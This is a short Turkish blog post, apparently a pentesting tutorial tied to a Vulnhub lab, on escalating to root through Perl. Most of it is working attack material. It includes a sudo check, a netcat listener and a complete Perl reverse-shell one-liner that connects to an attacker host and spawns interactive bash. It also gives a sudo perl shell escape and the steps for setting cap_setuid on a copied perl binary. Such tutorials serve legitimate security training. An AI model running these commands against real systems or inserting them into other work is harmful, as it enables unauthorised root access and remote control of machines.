top of page

Linux for Pentester: Perl Privilege Escalation

  • Writer: İbrahim Mert COŞKUN
    İbrahim Mert COŞKUN
  • Jan 26, 2022
  • 1 min read

Updated: Jul 21, 2022

Hedef makinada bir diğer hak yükseltme işlemi söz konusu ise sistemde bulunan Perl sayesinde bundan yararlanabiliriz.



- Sudo izinlerini kontrol edelim;

--> sudo -l


ree

- Kali makinasından listeneri açalım;

--> nc -lvnp 4445


Herhangi bir parola gerekmediği için root olacak perl betiğini çalıştıralım;


perl -e 'use Socket;$i="RHOST";$p=RPORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

Listenere geri döndüğümüzde root olduğumuzu görüyoruz;

ree

Bir diğer exploit yöntemi ise;

--> sudo perl -e exec "/bin/bash";'


Fotoğraf "https://www.hackingarticles.in/linux-for-pentester-perl-privilege-escalation/" adresinden alınmıştır
Fotoğraf "https://www.hackingarticles.in/linux-for-pentester-perl-privilege-escalation/" adresinden alınmıştır

Herhangi bir dosyaya herhangi bir yapışkan bit ayarlandığında, ayrıcalıklı ve ayrıcalıksız her kullanıcının bu dosyalara kolayca erişebiliriz, ancak güvenlik amacıyla, yalnızca sınırlı/tek kullanıcılı olanları paylaşmak veya bunlara erişmek istiyorsak;


which perl
cp $(which perl) /home/demo(kullanıcı)
setcap cap_setuid+ep /home/demo/perl

Aşağıdaki görüntüden, "demo" kullanıcısının "perl"i root olarak kolayca çalıştırabileceği ve bu nedenle perl kullanarak ayrıcalık yükseltme misyonumuzu başarıyla gerçekleştirmiş olduk.


ree


ree
Kapak Fotoğrafı; Vulnhub'un "MoneyBox1" adlı makinenin çözümü sırasında karşımıza çıkan fotoğraf kullanılmıştır; https://download.vulnhub.com/moneybox/MoneyBox.ova



 
 
 

Comments


Dünya üzerinde haksızlığa uğrayan, yardım bekleyen, Hak arayan onca mazlumun yanında bu sitenin haklarının pekte bir önemi yoktur. Tüm yazıları kullanabilirsiniz.

bottom of page